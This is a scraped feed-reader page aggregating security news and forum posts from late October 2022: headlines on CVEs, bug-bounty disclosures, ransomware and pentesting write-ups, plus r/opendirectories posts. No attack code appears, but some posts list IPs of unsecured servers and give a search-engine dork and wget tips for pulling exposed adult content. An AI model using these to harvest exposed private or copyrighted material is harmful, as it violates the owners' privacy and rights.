    submitted by /u/SCI_Rusher [link] [comments]
    Offensive Security Methodology Repo
    Hello repo under creation containing testing methodology and techniques for wireless, internal, external engagement and others cool stuff to share ;) https://github.com/lutzenfried/Methodology submitted by /u/lutzenfried [link] [comments]
    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows
    submitted by /u/lohacker0 [link] [comments]
  • Open

    SecWiki News 2022-10-25 Review
    安全同学讲Maven重打包的故事 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-25 Review
    安全同学讲Maven重打包的故事 by ourren 更多最新文章,请访问SecWiki
  • Open

    LastPass in Memory Exposure
    In this video, our Principal Research Analyst Scott Nusbaum goes over his research on LastPass Password Manager. He discusses how the credentials are exposed in memory to an attacker that is present on the host and is able to access the browser process. He also goes over on how LastPass could modify their extension to... The post LastPass in Memory Exposure appeared first on TrustedSec.
    A Primer on Cloud Logging for Incident Response
    Overview This blog post will provide an overview of common log sources in Azure and AWS, along with associated storage and analysis options. At a high level, cloud-based incidents can be categorized into host-based compromises (that is, compromises primarily involving virtual machines hosted in the cloud) and identity-based or resource-based compromises (compromises primarily involving cloud-native... The post A Primer on Cloud Logging for Incident Response appeared first on TrustedSec.
  • Open

    红队渗透测试之vulnerable_docker——docker逃逸
    本文项目中会用到信息收集、wordpress漏洞Getshell、内网信息枚举、docker逃逸、提权等,并且文章附带了获取稳定shell以及linux上线CS的Tips,欢迎大家来学习或者指出不足
    Hive勒索组织宣称已攻击塔塔电力,数据可能外泄
    前不久印度最大的电力集团塔塔电力公布遭遇网络攻击。10月25日,Hive勒索组织宣称对此次网络攻击负责。
    FreeBuf早报 | WhatsApp在全球多地发生故障;韩首次参加美主导的网络战联演
    韩国国防部24日说,韩国军队当天开始首次参加美国主导的“网络旗帜”多国联合网络攻防演习,演习将持续至28日。
    超2000万的安装量,Google Play已成恶意广告程序的温床
    其中一个名为DxClean的应用程序的安装次数更是超过500万次,搞笑的是,其用户评级竟然还有4.1分(满分5分)。
    反者道之动——fintech下的数据安全思考 | CIS 2022网络安全创新大会议题前瞻
    议题主要以漏洞挖掘从业者的视角分享Fuzzing技术的演进和发展,以及移动端框架层挖掘技术的探索实践。
    被索要6000万,这家汽车经销商坚持拒绝支付!
    英国著名汽车经销商集团Pendragon近期遭遇LockBit勒索软件组织攻击,部分数据被窃取,并被索要6000万美元。
  • Open

    Android Pentesting 101 — Part 2
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x3
    No content preview
    Faster your NMAP scan with “Agile Grabber”
    No content preview
  • Open

    Android Pentesting 101 — Part 2
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x3
    No content preview
    Faster your NMAP scan with “Agile Grabber”
    No content preview
  • Open

    Android Pentesting 101 — Part 2
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x3
    No content preview
    Faster your NMAP scan with “Agile Grabber”
    No content preview
  • Open

    Reflected Cross site scripting via Swagger UI
    Adobe disclosed a bug submitted by webcipher101: https://hackerone.com/reports/1656650
    A malicious admin can be able to permanently disable a Owner(Admin) to access his account
    Linktree disclosed a bug submitted by dewcode91: https://hackerone.com/reports/1718574 - Bounty: $600
  • Open

    Animation Reference Sheets
    http://incandescentdragon.com/Settei/preview/A4/Sheets/ crap ton of animation sheets from various anime and cartoons submitted by /u/Better_Base8805 [link] [comments]
    NASA photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    radio manuals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Apache Commons Configuration 远程命令执行 CVE-2022-33980
    作者:标准云 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 漏洞简介 Apache Commons Configuration 执行变量插值 (variable interpolation), 允许动态评估和扩展属性。插值的标准格式是"${prefix:name}",其中 "prefix" 用于查找定位执行插值 ...
  • Open

    Apache Commons Configuration 远程命令执行 CVE-2022-33980
    作者:标准云 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 漏洞简介 Apache Commons Configuration 执行变量插值 (variable interpolation), 允许动态评估和扩展属性。插值的标准格式是"${prefix:name}",其中 "prefix" 用于查找定位执行插值 ...
  • Open

    Buffer overflow, canary enabled but program only seems to accept arguments as input
    submitted by /u/Cascodius [link] [comments]

  • Open

    Racing Cats to the Exit: A Boring Linux Kernel Use-After-Free
    submitted by /u/0x414141 [link] [comments]
    Exploit archaeology: A forensic history of in-the-wild NSO Group exploits
    submitted by /u/DonnchaOC [link] [comments]
    OSINT analysis of Gulf focused job scams
    submitted by /u/jen140 [link] [comments]
    Exploiting a Flipper Zero
    submitted by /u/VVX7 [link] [comments]
    OSS patcher for CVE-2022-42889 (TextShell) - Finds and closes the vulnerability on deployed JAR files
    submitted by /u/SRMish3 [link] [comments]
    VulFi plugin for IDA updated to version 2.0 with new features
    submitted by /u/Martypx00 [link] [comments]
    Talk recordings from DEF CON 30
    submitted by /u/albinowax [link] [comments]
    Legitimate RATs: a comprehensive forensic analysis of the usual suspects
    submitted by /u/jeandrew [link] [comments]
  • Open

    Remotely Accessible Container Advisor exposed performance metrics and resource usage
    TikTok disclosed a bug submitted by tw4v3sx: https://hackerone.com/reports/1697599 - Bounty: $100
    IDOR Allows Viewer to Delete Bin's Files
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1074420 - Bounty: $500
    Viewer is able to leak the previous versions of the file
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1080700 - Bounty: $550
  • Open

    Biglots - corporate site with all assets available
    https://www.biglots.com/resources/ Seems their entire directory structure is exposed submitted by /u/xavierwestern [link] [comments]
    Diving and underwater photos
    http://hagainativ.com/wordpress/wp-content/uploads/ I did not go through every photo. Folders from 2016-02 onward seems to be empty submitted by /u/xavierwestern [link] [comments]
    MG Auto pictures and information
    http://www.omgc.info/wordpress/wp-content/uploads/ Didn't look through all the pics, but the site is for the Ottowa MG Club so most content is focused on that. submitted by /u/xavierwestern [link] [comments]
    [NSFW] Amateur pr0n pics and some movies.
    Went looking for onlyfans content - intitle:"index of" -inurl:"index of" onlyfans I figured there has to be someone dumb enough to put their content on an unsecured webserver... Juries out on what I found. https://www.kurtvip.com/wp-content/uploads/2020/ just a run of the mill wordpress index - change the year to move up or down as going up to the "uploads" folder looks like it's been secured. To avoid downloading all the extra resized images try --reject-regex=45x45 | 346x128 and so on. https://playblog.ws/play/wp-content/uploads/ https://fapdungeon.com/wp-content/uploads/ ditto for wp indexes - freely navigable. Even got one for the gay guys - https://nudesboys.com/wp-content/uploads/ submitted by /u/ringofyre [link] [comments]
  • Open

    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which lead to a Local File Inclusion (LFI)… Continue reading on Medium »
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »
    5000$ for Apple Stored Xss And Another Blind Xss Still under review
    How I found two Xss At Apple that Lead for high/crirical impact Continue reading on Medium »
    How I Found Three Credentials Leak on One Google Dork on Bugcrowd
    Tool Continue reading on Medium »
    Hacking a parking system
    Have you ever been to a shopping mall and used an NFC card to access(and pay) the parking spot? In this article, I will explain how I got… Continue reading on Medium »
  • Open

    Legitimate RATs: a comprehensive forensic analysis of the usual suspects
    submitted by /u/warm_kitchenette [link] [comments]
  • Open

    How can I read Threads memory using Memprocfs?
    I grabbed a ram capture (using winpmem) of a Windows 10 VM, I open the file with memprocfs and I can see the threads of a process, and I have the vvmem files. How did I know what memory positions are of each thread? I'm posting an image to help https://imgur.com/a/k6uhmCs submitted by /u/kabutor [link] [comments]
    Digital Evidence Specialist 1
    Hi. I’m in Miami, FL, and I see a job with the police department titled digital evidence specialist 1. It doesn’t have a description so I was wondering if from the title, it seems like computer forensics? What would I do in this job? submitted by /u/Roccstarr95 [link] [comments]
    can anyone identify the content of this image ? like what is going on in here?
    submitted by /u/shalnark90 [link] [comments]
  • Open

    Atlassian Jira Align High-Risk Vuln Write-up
    submitted by /u/breach_house [link] [comments]
  • Open

    Cloudgoat AWS CTF solution- Scenerio 9 (codebuild_secrets)
    Scenerio 9- codebuild_secrets Continue reading on Medium »
    ROOTCON 16 (Hacking Conference)
    Here are the pictures i captured during the event of Rootcon 16 that held in Vista Tagaytay. Continue reading on Medium »
  • Open

    Lest we forget? I forgot, how to keep fundamental information fresh in our minds?
    A colleague reminded me today that CSRF can be implemented client-side a-la Facebook. It made me question what volume of relevant, useful and creative information and techniques had escaped from my memory that might otherwise have helped me find a bug or recommend a defence in depth approach to our development team. I wondered if the people in this sub might share their methods for retaining this information. I keep (bad) notes, I complete training like pentesterlabs and new PortSwigger stuff when it is published and I spend a lot of time looking things up online when I'm digging deep. Does anyone have any further recommendations that will help me to not forget the fundamentals when my brain always wants to chase the latest research and fun bugs? submitted by /u/jeffreyshran [link] [comments]
    IT Disaster Recovery Assessment
    Hi all! I’m currently trying to design an baseline assessment for IT Disaster Recovery. I want the most important things in this baseline assessment. Do you guys have any sources about models, tools, books, literature regarding IT Disaster Recovery? Thanks in regards! submitted by /u/overigegebruiker12 [link] [comments]
    Typical day of malware analyst
    Hey there, Got a couple of questions for all of you with jobs related to malware analysis: what's your typical workday look like? do you do malware analysis only or it's only part of your responsibilities? if so how much of it is actual malware analysis and what are other activities? what kind of company are you working for? is it AV or something else? how did you get into your current position? was it always security related? do you hold any related certifications? do you think they are helpful enough to aim for them? are you working in the office or remotely? is it possible/realistic to work on this kind of a position fully remotely? any advice for someone who's considering getting into/traversing to such a position? submitted by /u/koooch [link] [comments]
  • Open

    SecWiki News 2022-10-24 Review
    赏金猎人系列-如何测试sso相关的漏洞 by 蓝色淡风 Bold-Falcon: 开源的自动化恶意软件分析系统 by ourren SecWiki周刊(第451期) by ourren 一文帮你解决APP抓包难题 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-24 Review
    赏金猎人系列-如何测试sso相关的漏洞 by 蓝色淡风 Bold-Falcon: 开源的自动化恶意软件分析系统 by ourren SecWiki周刊(第451期) by ourren 一文帮你解决APP抓包难题 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    CNAME Cloaking: Disguising Third Parties Through the DNS
    CNAME cloaking uses DNS records to hide when browsers are sending data to a third party such as an advertiser. The post CNAME Cloaking: Disguising Third Parties Through the DNS appeared first on Unit 42.
  • Open

    ‍IW Weekly #30: $10,000 Bounty, Bypassing Filtration, DDoS Attack, Fuzzing for SQL Injection…
    No content preview
  • Open

    ‍IW Weekly #30: $10,000 Bounty, Bypassing Filtration, DDoS Attack, Fuzzing for SQL Injection…
    No content preview
  • Open

    ‍IW Weekly #30: $10,000 Bounty, Bypassing Filtration, DDoS Attack, Fuzzing for SQL Injection…
    No content preview
  • Open

    FreeBuf早报 | 英国建筑巨头因漏洞被罚款 440 万英镑;勒索攻击正在针对教育行业
    一家英国建筑公司被数据保护监管机构罚款超过 400 万英镑,此前一系列安全漏洞导致黑客窃取和加密了 11万名现任和前任员工的个人信息。
    Fuzz技术演进与移动框架安全探索实践 | CIS 2022网络安全创新大会议题前瞻
    从漏洞挖掘从业者视角分享Fuzzing技术的演进和发展,以及移动端框架层挖掘技术的探索实践。
    超市巨头麦德龙遭网络攻击,支付系统中断
    至少从10月17日起,麦德龙奥地利、德国和法国地区的门店已经发生IT故障。
    拥有两个名称的新勒索组织正针对全球多家公司
    两个名为TommyLeaks和SchoolBoys的新网络勒索组织正把攻击目标瞄准全球多家公司,但经过调查,背后是系同一团伙所为。
    二十大之网络安全,听听代表们怎么说
    网络安全作为网络强国、数字中国的底座,将在未来的发展中承担托底的重担,是我国现代化产业体系中不可或缺的部分。
  • Open

    A study of malicious CVE proof of concept exploits in GitHub
    Article URL: https://arxiv.org/abs/2210.08374 Comments URL: https://news.ycombinator.com/item?id=33314496 Points: 3 # Comments: 0
  • Open

    伪装成 Word 文件的 GuLoader 恶意软件正在韩国传播
    作者:威胁情报团队 译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/40283/ ASEC分析团队发现,GuLoader恶意软件正在分发给韩国企业用户。GuLoader是一款下载器,自过去以来一直稳定分发,下载各种恶意软件。分发的网络钓鱼邮件如下所示,并附加了一个 HTML 文件。 网络钓鱼邮件 当用户打开附加的 HTML 文件时,将从下面...
    Apache Commons Text 远程命令执行 CVE-2022-42889
    作者:标准云 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 漏洞简介 Apache Commons Text 执行变量插值 (variable interpolation), 允许动态评估和扩展属性。插值的标准格式是"${prefix:name}",其中 "prefix" 用于查找定位执行插值 org.apach...
    CVE-2022-41852 Apache Commons Jxpath 命令执行漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/L1GyToB0pYaKua8FZi9tiw 项目介绍 Apache Commons JXPath是美国阿帕奇(Apache)基金会的一种 XPath 1.0 的基于 Java 的实现。JXPath 为使用 XPath 语法遍历 JavaBeans、DOM 和其他类型的对象的图形提供...
  • Open

    伪装成 Word 文件的 GuLoader 恶意软件正在韩国传播
    作者:威胁情报团队 译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/40283/ ASEC分析团队发现,GuLoader恶意软件正在分发给韩国企业用户。GuLoader是一款下载器,自过去以来一直稳定分发,下载各种恶意软件。分发的网络钓鱼邮件如下所示,并附加了一个 HTML 文件。 网络钓鱼邮件 当用户打开附加的 HTML 文件时,将从下面...
    Apache Commons Text 远程命令执行 CVE-2022-42889
    作者:标准云 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 漏洞简介 Apache Commons Text 执行变量插值 (variable interpolation), 允许动态评估和扩展属性。插值的标准格式是"${prefix:name}",其中 "prefix" 用于查找定位执行插值 org.apach...
    CVE-2022-41852 Apache Commons Jxpath 命令执行漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/L1GyToB0pYaKua8FZi9tiw 项目介绍 Apache Commons JXPath是美国阿帕奇(Apache)基金会的一种 XPath 1.0 的基于 Java 的实现。JXPath 为使用 XPath 语法遍历 JavaBeans、DOM 和其他类型的对象的图形提供...

  • Open

    FreeBuf早报 | 卡塔尔世界杯官方应用被指是间谍软件;国际刑警组织建立元宇宙总部
    前往卡塔尔观看世界杯的人都需要下载安装两个应用—— Ehteraz 和 Hayya,它们被指为间谍软件。
  • Open

    What is the difference between VPN and Proxy traffic encryption.
    Hi guys. I'm familiar with the concept that a VPN connects you to a different network, and basically makes you a client within that network, but a proxy (like SOCKS5) forwards your traffic (and I'd love to be corrected on that should I be mistaken) but I'm trying to pinpoint the difference with regard to encryption of the flow of traffic. Things I'm reading online are saying a proxy does not entirely encrypt the traffic, only between the proxy and the client. But is this any different from a VPN?? I thought that was literally the same thing, except a VPN would give you access to local network devices in some instances. But this is also, I suspect, VPN company marketing horseshit. Please could someone clarify the difference as I am starting to go mad. submitted by /u/reece4504 [link] [comments]
    First certification
    I have the opportunity to choose a certification that my company will pay for and I'm quite lost with all these different certs and orgs even after researching them, so I would like to ask which certification would you recommend me to get? I'd like it to be useful as well as reasonably hard for my experience. It should be blue team/incident handling related. My background: I finished my Master's in Information Security this summer and got a full time job as a security analyst with my main responsibilities being incident handling and vulnerability management. During my studies I also worked as a SOC analyst. I have about 2 years of working experience in total. The only certification I've done during my school years are some CCNAs. submitted by /u/FreakySeahorse [link] [comments]
    Are Alternative Operating Systems More Secure ? OpenBSD, FreeBSD..
    Are alternative operating systems like OpenIndiana , FreeBSD , OpenBSD more secure than Linux , Windows and Mac ? submitted by /u/LegitimateCelibate [link] [comments]
    What’s a good cross-platform browser that has end-to-encrypted sync data like bookmarks, history, open tabs, etc?
    What’s a good cross-platform browser that has end-to-encrypted sync data like bookmarks, history, open tabs, etc? submitted by /u/Bored-Giraffe [link] [comments]
  • Open

    What is Website Footprinting?
    In terms of Cybersecurity, footprinting refers to the process of collecting as much information as possible about the target to find a way… Continue reading on System Weakness »
    33 quick and simple Twitter threads about OSINT
    I only started a blog on Medium today, but I’ve had a Twitter account about OSINT tools and techniques for over a year now. In this post I… Continue reading on Medium »
    SPY NEWS: 2022 — Week 42
    Summary of the espionage-related news stories for the Week 42 (October 16–22) of 2022. Continue reading on Medium »
  • Open

    Prompt injection attack on GPT-3 powered chatbots
    submitted by /u/verfahrensweise [link] [comments]
    ScreenshotBOF - CobaltStrike BOF to take screenshots without fork&run
    submitted by /u/CodeXTF2 [link] [comments]
    cypherhound - Python app that contains 190+ neo4j cyphers for BloodHound data
    submitted by /u/edreatingmonkey [link] [comments]
  • Open

    How To Craft A Professional Bug Bounty Report (Extra $$)
    TL;DR- Documenting the bugs or vulnerabilities you’ve found is the last step in bug hunting, make sure to finish strong and get the… Continue reading on The Gray Area »
    Paribus Community Update
    The Paribus protocol is the leading lending and borrowing protocol functional on the Cardano chain and capable of token and NFT… Continue reading on Medium »
    Broken Link Hijacking — My Second Finding on Hackerone!
    Broken Link Hijacking (BLH) or Link Takeover, whatever you called it, the concept is very simple. If you get any broken links of any… Continue reading on Medium »
    HTML INJECTION DAN XSS PADA WEBSITE HOSTEKO.COM
    Hai, Continue reading on Medium »
  • Open

    Write-up: HTTP request smuggling, basic CL.TE vulnerability @ PortSwigger Academy
    No content preview
    Exposed .git Directory Exploitation
    No content preview
    SQL Injection: An Overview
    No content preview
    Hacked Tathva ’22 Biggest Techno-Management Fest in South India
    No content preview
    We’ve seized a hacker's computer, what now?
    Imagine you are given a hard drive that you need to examine for a criminal investigation. As is for handling all evidence, you need to be… Continue reading on InfoSec Write-ups »
  • Open

    Write-up: HTTP request smuggling, basic CL.TE vulnerability @ PortSwigger Academy
    No content preview
    Exposed .git Directory Exploitation
    No content preview
    SQL Injection: An Overview
    No content preview
    Hacked Tathva ’22 Biggest Techno-Management Fest in South India
    No content preview
    We’ve seized a hacker's computer, what now?
    Imagine you are given a hard drive that you need to examine for a criminal investigation. As is for handling all evidence, you need to be… Continue reading on InfoSec Write-ups »
  • Open

    Write-up: HTTP request smuggling, basic CL.TE vulnerability @ PortSwigger Academy
    No content preview
    Exposed .git Directory Exploitation
    No content preview
    SQL Injection: An Overview
    No content preview
    Hacked Tathva ’22 Biggest Techno-Management Fest in South India
    No content preview
    We’ve seized a hacker's computer, what now?
    Imagine you are given a hard drive that you need to examine for a criminal investigation. As is for handling all evidence, you need to be… Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-10-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Power On/Off .E01 file / Portable Case Axiom
    Hello everyone! I have a question that I could not find the answer to: what tool can I use to view when a computer had turned on and off? I've the EnCase (E01) and the Portable Case of Magnet Axiom Thanks a lot to everyone! submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Bringing Modern Authentication APIs (FIDO2 WebAuthn, Passkeys) to Linux Desktop
    submitted by /u/sanitybit [link] [comments]
    cypherhound - Python app that contains 190+ neo4j cyphers for BloodHound data
    submitted by /u/edreatingmonkey [link] [comments]
    The Curious Case of ManageEngine’s Password Manager Pro's Password Database
    submitted by /u/Khryse [link] [comments]
    Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals
    submitted by /u/sanitybit [link] [comments]
  • Open

    Science Fiction books and audio
    ​ Sci Fi Audio http://www.onesmedia.com/SCIFI/ ​ Sci Fi Books https://eyeofmidas.com/scifi/ http://www.pauladaunt.com/books/Classic%20Science%20Fiction/ submitted by /u/Shitemoji69 [link] [comments]

  • Open

    Movies, Series (EN) - Part 1 (Repost)
    http://85.224.102.85/ http://195.154.171.232/ http://178.128.170.189:81/ https://209.141.43.80/ http://140.238.19.242/ http://185.223.160.3/ https://83.128.76.15/ submitted by /u/SubliminalPoet [link] [comments]
    Movies, Series (EN) - Part 2
    http://51.68.185.186:49156/md/ http://65.108.68.213/ http://73.65.226.79:8080/ http://144.137.216.162:8080/ http://184.148.254.139:40001/ http://192.119.8.98:85/ http://72.253.204.218:8888/movies/ http://102.22.12.10:8089/ https://79.119.245.140/ http://62.210.122.240/ < Previous Post submitted by /u/SubliminalPoet [link] [comments]
    [NSFW] Series, movies, music, software, and MUCH more
    https://62.210.204.15/ => Movies, series ​ https://51.158.151.187/Jay => Music ​ https://51.159.55.137/ => Chinese podcasts and speeches, educational content ​ https://62.210.97.40/dl4.apkhome.net/f/ => Lots of modded apks ​ https://62.210.99.29/dl.uapk.pro/ => Lots of modded apks ​ http://163.172.94.57/ => Porn ​ http://195.154.42.151/ => Movies, series, porn, switch roms, music, and more (mostly in TDownloads directory) ​ http://195.154.233.56:8080/ => French memes, lots of wallpaper material (in Bordel/fivesh folder), games, and more ​ http://163.172.44.24:9000/ => French udemy courses, series ​ http://51.15.174.150/torrent/ => Series, movies ​ http://195.154.236.164:48/ => Movies, anime, some roms ​ https://51.158.36.78/s3.mangarc.com/ => Untriaged arab-translated manga ​ http://51.159.53.92/ => Movies, series, fonts, software, games ​ http://163.172.49.90:9999/ => Physics PDFs, series, movies ​ http://195.154.235.161:8888/ => Audiobooks, series, movies ​ http://51.15.160.202:8080/ => Movies, series, software, music, misc ​ http://163.172.98.148:8081/ => Movies, series ​ http://163.172.180.67:81/ => Movies, series, anime, software, games, music, books, and more ​ http://51.15.142.32:8008/ => Music, software, movies, series, misc ​ http://51.15.177.190:8081/ => Tutorials, courses, loads of various chinese PDFs ​ http://51.15.178.223/ => Series, movies ​ http://51.15.179.151/ => Series, movies (mostly german) ​ http://51.158.145.138/ondemand/ => Italian movies and cooking videos ​ http://51.158.151.61:8080/ => Games, movies, anime, OSTs ​ http://51.159.29.81/ => Software (be careful!) ​ http://51.159.29.224/web/Software/ => Rhythm games archives ​ http://62.210.132.17/ => Series, movies, music ​ http://51.15.174.41:8000/ => Hentai, porn, some series and movies submitted by /u/MasterIO02 [link] [comments]
    Links with descriptions ;0)~...
    This is a google drive, you can open each folder & download each file separately or you can just click the download arrow and it will zip up the folder & download all in the folder...Or use the weget a lot faster... For all our gay/nonbinary/women/females/curious/collectors of r/opendirectories ... So expect NSFW Images & vids... https://drive.google.com/drive/folders/16n9JMdFBqNTToiPASUDmb-zRwxw9kFTj ​ Yes in this folder you will find Mp3's & image https://mixtaperiot.com/wp/wp-content/media/ ​ Posting this because of the tweeker-gallery so to recap the folder is full of docs and images... http://www.forensic-applications.com/meth/ ​ Phone tec & stuff 2021, looks like some sort of hacking for phones... In this directory on you can except to find & docs vids so learn or not... https://dl.parsi-rom.com/VIDEO/ ​ Some small vids of bdsm club, viewer beware... Yes this is an edgy drive, so Ooo, shocking or boring you decide... NSFW Images. mp4's ect... http://lantredudiable.eu/video/ ​ Change your backgrounds... Images and more images... http://spartacuswallpaper.com/gallery/ submitted by /u/xanderTgreat [link] [comments]
    NASA image catalogs?
    Apologies if this violates rule #2, but does anyone here know where/how to find NASA's full catalog of images? Obviously you can find a lot on the nasa.gov site, but those galleries are curated and definitely not comprehensive. I seem to remember coming across online directories of literally all of their images, separated by project/date/etc., but now I can't seem to find them and I'm wondering if I'm remembering wrong. Even suggestions on what to search for would be greatly appreciated. Thanks in advance! submitted by /u/netsgnut [link] [comments]
    FTP site with ISOs, VM images etc.
    Good enough collection of Virtual machines, ISOs, etc. ​ http://ftp.anisa.co.ir/ submitted by /u/amritajaatak [link] [comments]
  • Open

    Hacked Tathva ’22 Biggest Techno-Management Fest in South India
    - 7h3h4ckv157 Continue reading on InfoSec Write-ups »
    Android Pentesting 101 — Part 1
    Welcome to this new series of Android Pentesting. This series is about how you can hack into Android and find vulnerabilities in it using… Continue reading on InfoSec Write-ups »
    An Unexpected Reflected XSS
    Hello, everyone my name is Pavitra i am not much old i am only 13 but still a Cyber sec enthusiast i am doing bug bounty since the age of… Continue reading on Medium »
  • Open

    installed.json sensitive file was publicly accessible on your web application which discloses information about authors and admins
    Yelp disclosed a bug submitted by whitehacker18: https://hackerone.com/reports/1586524
  • Open

    Help a newbie get a beginner pen testing job. GIAC certified.. almost..
    Hi all! So I have my Splunk core certified cert. it was free at the time. I just passed my GIAC gfact Cert from SANS. Im currently enrolled in Sec401 for GSEC cert and I have one more with sans after this. (scholarship program). I use hack the box and have some decent real world skills. Say once im done with my Certs from sans and have my GIAC. How can I get a job in pen testing and red teaming>? What job boards are best or just how in general. I have tech experiences in my past but this is my first time breaking into red teaming pen testing. Any help would be GREATLY appreciated. Thanks! submitted by /u/BaMB00Z [link] [comments]
  • Open

    SecWiki News 2022-10-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Collect information of internet-connected sandboxes
    submitted by /u/Snoo_27235 [link] [comments]
    SCuBA: M365 Security Baseline Assessment Tool by CISA
    submitted by /u/sanitybit [link] [comments]
  • Open

    REST API FUZZING
    With the developing technology, applications are transitioning to a platform-independent structure. In order to achieve this independence… Continue reading on Medium »
  • Open

    REST API FUZZING
    With the developing technology, applications are transitioning to a platform-independent structure. In order to achieve this independence… Continue reading on Medium »
  • Open

    Android Pentesting 101 — Part 1
    No content preview
  • Open

    Android Pentesting 101 — Part 1
    No content preview
  • Open

    Android Pentesting 101 — Part 1
    No content preview
  • Open

    Adversary emulation with caldera
    emulate adversaries and automate your operation Continue reading on Medium »
  • Open

    记一次TP框架的公益SRC挖掘
    记一次关于tp5.0.15与php7.3的公益SRCgetshell
  • Open

    OSINT and Top 15 Open-Source Intelligence Tools
    This blog sheds some light on the term OSINT, its types, actors interested in OSINT gathering, exploration, and what benefits OSINT… Continue reading on Medium »

  • Open

    access nagios dashboard using default credentials in ** omon1.fpki.gov, 3.220.248.203**
    U.S. General Services Administration disclosed a bug submitted by ahmed0x0mahmoud: https://hackerone.com/reports/1700896
    Full payment bypass to use premium subscription.
    Krisp disclosed a bug submitted by n0_m3rcy: https://hackerone.com/reports/1670304 - Bounty: $100
  • Open

    How an Attacker Can Achieve Persistence in Google Cloud Platform (GCP) with Cloud Shell
    submitted by /u/0x414141 [link] [comments]
    A Journey To The Dawn: Finding & exploiting a use-after-free privilege escalation vulnerability in Linux kernel’s io_uring subsystem (CVE-2022-1786)
    submitted by /u/0x414141 [link] [comments]
    OpenSSL: How to Configure Supported TLS Groups to Be Resistant to the DHEat attack
    submitted by /u/c0r0n3r [link] [comments]
    Antignis - Configure Windows Hostbased firewall
    Blogpost: https://www.huntandhackett.com/blog/introducing-antignis-a-data-driven-tool-to-configure-windows-hostbased-firewall submitted by /u/One-Assistance-8552 [link] [comments]
  • Open

    OTP in forget password | how to bypass OTP verification | OTP poc
    OTP Continue reading on Medium »
    Exploiting Elastic Search Instances
    Elastic search instances can have exploitation of READ,WRITE,DELETE of data. Continue reading on System Weakness »
    Subdomain Takeovers, 0Day Exploits for CVEs, Perceptual Analysis….
    Conducting Vulnerability Assessments at Scale ft. ARPSyndicate & ScanFactory Continue reading on Medium »
    Bug Bounty Tips
    cc: nahamsec Continue reading on System Weakness »
    $1,000+ P1: PII Disclosure W/ IDOR
    TL;DR- A somewhat simple, everyday IDOR that lead to PII disclosure, and could possibly be used to further exploit the app. Continue reading on The Gray Area »
    What are Smart Contracts on Blockchain?
    What are the smart contracts? Continue reading on Bug Zero »
    P1 Bug Bounties: Multi-Factor Authentication Bypass
    TL;DR-A walkthrough on how to exploit multi-factor authentication, using Burpsuite and a few other automation tools. Continue reading on The Gray Area »
    Information Disclosure — My First Finding on Hackerone!
    Information Disclosure is a kind of bug that is not so hard to find but could has huge impact. Some time you could get a very sensitive… Continue reading on Medium »
  • Open

    Certificate Pinning in Android requiring backup pin
    Hi. I am trying to implement certificate pinning in Android by folloeing the Network Security Configuration. In the https://developer.android.com/training/articles/security-config#CertificatePinning section, it says there that it is recommended to add a backup pin. What is this backup pin and how to generate it? I managed to generate the main pin and it only returned 1 SHA-256 pin. submitted by /u/apprentice4ever [link] [comments]
    Does anyone have a good vendor recommendation similar to the SQREEN RASP and in-app WAF?
    After Sqreen was acquired by Datadog we are looking for a new vendor. Any help would be great! submitted by /u/anonymous666444 [link] [comments]
    How to find an exploit POC?
    Is there any system where I can search for a CVE number and get a POC exploit? I've had some alerts about vulnerabilities in some third party dependencies but I want to demo an exploit if possible to light fire under peoples' asses so that it actually gets fixed. submitted by /u/dbxp [link] [comments]
    [Android] How is Open Mobile API (OMAPI) different from Android Keystore API+Android StrongBox?
    Hi, They both are used to store secure keys on the Secure Element (SE). I heard that Android Keystore API is used to access SE basic functionality (i.e., to use it only as a container to store keys): Keystore talks to -> StrongBox, which talks to -> SE. However, to access SE's advanced functionality one need to use Open Mobile API (OMAPI), which talks to SE. Is the above-said correct or do I misunderstand something? submitted by /u/LSDwarf [link] [comments]
    Network engineer path
    Hello, I’m posting here because i’m a bit lost and I don’t know what to do with my career. I’m a network engineer currently working in the banking industry. Currently I work a lot on campus networking and especially Wifi (Cisco and Aruba) and NAC stuff (mostly ISE), but I’m one of the few in the team which is able to work on almost every perimeter (LAN, WIFI, Automation, Routing, Security). Right now I don’t really know what would be best for my career, I could dig more in WIFI for exemple and become a specialist in one of those field or keep being a « jack of all trade master of none ». But i’m always afraid by choosing to become a specialist on a field, WiFi, i’m closing myself some doors and be less futur proof in my career. So I’m interested from your experience what do you think would be best to do ? Thanks a lot submitted by /u/RedoxyLL [link] [comments]
  • Open

    Accidentally Deleted Partition While Reinstalling Windows
